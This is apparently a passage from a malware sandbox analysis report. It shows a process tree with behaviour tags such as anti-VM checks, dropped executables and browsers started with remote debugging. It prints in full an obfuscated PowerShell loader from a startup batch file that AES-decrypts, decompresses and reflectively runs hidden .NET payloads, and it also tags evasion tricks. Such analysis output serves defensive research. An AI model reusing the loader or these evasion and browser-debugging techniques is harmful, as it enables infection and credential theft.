    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4408
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2656
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:568
- - C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
    "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5372
- - C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2556
- - C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
    "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5832
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6124
- - C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4104
- - C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
    "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2104
- - C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
    "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:3912
- - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3804
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1616
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91615cc40,0x7ff91615cc4c,0x7ff91615cc58
        6⤵
        
        PID:1832
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1932 /prefetch:2
        6⤵
        
        PID:1280
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:3
        6⤵
        
        PID:3116
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2196 /prefetch:8
        6⤵
        
        PID:1164
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3148 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1604
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3040
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4216,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4224 /prefetch:8
        6⤵
        
        PID:5008
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4440,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4384 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5856
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4208,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4740 /prefetch:8
        6⤵
        
        PID:4348
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4884 /prefetch:8
        6⤵
        
        PID:1672
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5032 /prefetch:8
        6⤵
        
        PID:3792
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5200,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5224 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5192
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5056,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4744 /prefetch:8
        6⤵
        
        PID:1628
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2332
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc58
        6⤵
        
        PID:5844
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:2
        6⤵
        
        PID:5808
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1716,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2140 /prefetch:3
        6⤵
        
        PID:3148
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2056,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2216 /prefetch:8
        6⤵
        
        PID:1884
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3152 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4816
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2640
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4388 /prefetch:8
        6⤵
        
        PID:5192
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4444,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4620 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3948
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4400,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4784 /prefetch:8
        6⤵
        
        PID:3504
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4224,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4628 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5960
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4220,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4212 /prefetch:8
        6⤵
        
        PID:2880
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5156 /prefetch:8
        6⤵
        
        PID:5972
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5372,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5356 /prefetch:8
        6⤵
        
        PID:832
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5464,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5472 /prefetch:8
        6⤵
        
        PID:5488
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4880 /prefetch:8
        6⤵
        
        PID:5240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3264
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd8
        6⤵
        
        PID:1720
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
        6⤵
        
        PID:1012
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
        6⤵
        
        PID:220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
        6⤵
        
        PID:5488
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1988 /prefetch:2
        6⤵
        
        PID:5464
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2712 /prefetch:2
        6⤵
        
        PID:6024
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2016 /prefetch:2
        6⤵
        
        PID:4840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2332 /prefetch:2
        6⤵
        
        PID:2040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4612 /prefetch:2
        6⤵
        
        PID:4772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
